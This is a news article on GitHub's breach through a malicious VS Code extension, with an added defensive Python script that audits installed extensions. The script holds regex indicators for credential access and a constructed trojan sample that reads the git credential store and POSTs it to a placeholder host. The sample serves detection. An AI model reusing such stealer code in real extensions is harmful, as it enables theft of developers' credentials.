GitHub Confirms Breach of 3,800 Internal Repositories After Employee Installs Malicious VS Code Extension
A Single Plugin, Thousands of Repositories
GitHub has confirmed a significant security lapse after a single employee installed a malicious Visual Studio Code extension, leading to the compromise of roughly 3,800 internal repositories. The incident highlights a persistent and growing vulnerability in the developer ecosystem: the trust placed in third-party plugins within integrated development environments (IDEs).
The breach came to light after the TeamPCP hacker group posted on the Breached cybercrime forum, claiming they had acquired access to private GitHub source code. The group sought a minimum of $50,000 for the data, stating they were not interested in extorting GitHub directly but were looking for a single buyer before potentially leaking the data for free.
In an official statement, GitHub noted that it detected and contained the compromise of the employee’s device shortly after the activity was flagged. The company acted by removing the unnamed trojanized extension from the VS Code marketplace and isolating the affected endpoint to prevent further lateral movement within its network.
“Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only,” the company stated. “The attacker’s current claims of ~3,800 repositories are directionally consistent with our investigation so far.”
The TeamPCP Connection
While GitHub has not formally attributed the attack, the hallmarks of the breach align with the activities of TeamPCP. The group has a documented history of targeting developer platforms and supply chains, with previous campaigns hitting PyPI, NPM, and Docker. More recently, they were linked to the “Mini Shai-Hulud” campaign, which reportedly impacted employees at OpenAI.
The group’s strategy is rarely about traditional ransomware. Instead, they focus on high-value source code and credentials, abusing the specialized tools developers use daily rather than attacking the network perimeter. A VS Code extension runs in the editor’s extension host with the same privileges as the developer who installed it: there is no permission prompt or sandbox between it and the local filesystem, environment variables, cloned repositories, or the credentials that ship with them. By poisoning an extension, attackers can effectively turn a developer’s own workstation into a gateway for data exfiltration, and the traffic leaves as an ordinary user session rather than as an intrusion.
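One control that follows from the point above is an inventory of what is actually installed on developer machines, checked against a publisher allowlist and a few static indicators of credential access in the bundled JavaScript. The script below is an added example, not GitHub’s tooling or code from the article. It assumes the on-disk layout of a VS Code extensions directory (one folder per extension containing package.json with a "main" entry point, as under ~/.vscode/extensions); the allowlist, the indicator patterns, and the two sample extensions it builds in a temporary directory are constructed for illustration.

```python
"""Audit installed VS Code extensions: publisher allowlist plus static indicators
of credential access and outbound traffic in the bundled extension code.

Added example (not from the article). Assumes the ~/.vscode/extensions layout:
<root>/<publisher>.<name>-<version>/package.json with a "main" entry point.
"""
import json
import re
import tempfile
from pathlib import Path

# Assumption: publishers the organisation has vetted; anything else is flagged.
ALLOWED_PUBLISHERS = {"ms-python", "ms-vscode", "redhat", "golang"}

# Assumption: heuristic indicators that warrant a manual look, not a vendor signature set.
INDICATORS = {
    "spawns child processes": re.compile(r"""require\(\s*['"]child_process['"]\s*\)"""),
    "touches SSH directory": re.compile(r"\.ssh[/\\]"),
    "reads git credential store": re.compile(r"\.git-credentials"),
    "resolves home directory": re.compile(r"\bos\.homedir\(\)"),
    "makes outbound HTTP(S) request": re.compile(r"""\bhttps?\.request\(|\bfetch\(\s*['"]https?://"""),
}


def audit_extension(ext_dir: Path) -> list[str]:
    """Return findings for one extension directory; an empty list means nothing was flagged."""
    findings = []
    try:
        manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    except (OSError, ValueError) as exc:
        return [f"unreadable manifest: {exc}"]

    publisher = manifest.get("publisher", "<missing>")
    if publisher not in ALLOWED_PUBLISHERS:
        findings.append(f"publisher '{publisher}' is not on the allowlist")

    # "*" activates the extension on every editor start, whatever the workspace.
    if "*" in manifest.get("activationEvents", []):
        findings.append("activates unconditionally (activationEvents contains '*')")

    main = manifest.get("main")
    if main:
        # VS Code allows "main": "./out/extension" without the .js suffix.
        code_path = ext_dir / main
        if not code_path.is_file():
            code_path = code_path.with_name(code_path.name + ".js")
        if not code_path.is_file():
            findings.append(f"declared entry point {main!r} is missing")
        else:
            source = code_path.read_text(encoding="utf-8", errors="replace")
            for label, pattern in INDICATORS.items():
                if pattern.search(source):
                    findings.append(f"{label} ({code_path.name})")
    return findings


def audit_extensions_dir(root: Path) -> dict[str, list[str]]:
    """Audit every extension folder under root, keyed by folder name."""
    return {p.name: audit_extension(p) for p in sorted(root.iterdir()) if p.is_dir()}


# Constructed sample: a harmless "hello" command extension.
BENIGN_JS = """\
const vscode = require('vscode');
function activate(context) {
  context.subscriptions.push(vscode.commands.registerCommand('hello.greet',
    () => vscode.window.showInformationMessage('Hello')));
}
module.exports = { activate };
"""

# Constructed sample: a trojanized lookalike that reads the git credential store and POSTs it out.
TROJAN_JS = """\
const vscode = require('vscode'), fs = require('fs'), os = require('os'),
      path = require('path'), https = require('https');
function activate(context) {
  const creds = fs.readFileSync(path.join(os.homedir(), '.git-credentials'), 'utf8');
  const req = https.request({ host: 'collector.invalid', path: '/upload', method: 'POST' });
  req.end(creds);
  context.subscriptions.push(vscode.commands.registerCommand('hello.greet',
    () => vscode.window.showInformationMessage('Hello')));
}
module.exports = { activate };
"""


def _write_extension(root: Path, dirname: str, manifest: dict, code: str) -> None:
    ext = root / dirname
    (ext / "out").mkdir(parents=True)
    (ext / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    (ext / "out" / "extension.js").write_text(code, encoding="utf-8")


def demo() -> dict[str, list[str]]:
    """Build the two constructed extensions in a temporary directory and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        _write_extension(root, "ms-vscode.hello-1.0.0",
                         {"name": "hello", "publisher": "ms-vscode", "main": "./out/extension",
                          "activationEvents": ["onCommand:hello.greet"]}, BENIGN_JS)
        _write_extension(root, "codehelperz.hello-1.0.1",
                         {"name": "hello", "publisher": "codehelperz", "main": "./out/extension",
                          "activationEvents": ["*"]}, TROJAN_JS)
        return audit_extensions_dir(root)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or ["ok"])
```

Point `audit_extensions_dir` at a real extensions folder to run it against a workstation. The indicators are deliberately coarse: legitimate extensions also spawn processes and make HTTPS requests, so the output is a review queue, not a verdict, and the publisher allowlist is the control that actually blocks a lookalike publisher like the constructed one here.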
The Marketplace Vulnerability
The VS Code Marketplace is the primary hub for add-ons that enhance Microsoft’s popular editor, but it has increasingly become a hunting ground for threat actors. This is not the first time the marketplace has been used as a delivery vector for malware. Over the last several years, multiple extensions with millions of downloads have been pulled after being found to contain credential stealers or cryptominers.
Last year, security researchers flagged a series of extensions posing as legitimate development tools that infected systems with the XMRig cryptominer. In other instances, threat actors like “WhiteCobra” flooded the marketplace with dozens of crypto-stealing plugins. More recently, in January, two AI-based coding assistants—boasting 1.5 million installs—were found to be exfiltrating developer system data to servers located in China.
Impact and Scope
GitHub has emphasized that there is currently no evidence that customer data was compromised; its assessment is that the exfiltration was limited to the affected internal repositories. For a platform that supports over 180 million developers and 90% of the Fortune 100, the distinction between “internal” and “customer” data is critical to maintaining trust.
However, the theft of nearly 4,000 internal repositories gives attackers a blueprint of GitHub’s own inner workings. Source code of that scope could be mined for further vulnerabilities, for any configuration or credentials that were checked in alongside it, or for the detail needed to craft more convincing social engineering attacks against GitHub employees in the future.
The incident serves as a stark reminder for DevOps and security teams that the “developer inner loop”—the tools used to write and test code—is often the weakest link in the software supply chain. As developers increasingly rely on AI-powered assistants and third-party plugins to speed up productivity, the attack surface for these types of targeted attacks continues to expand.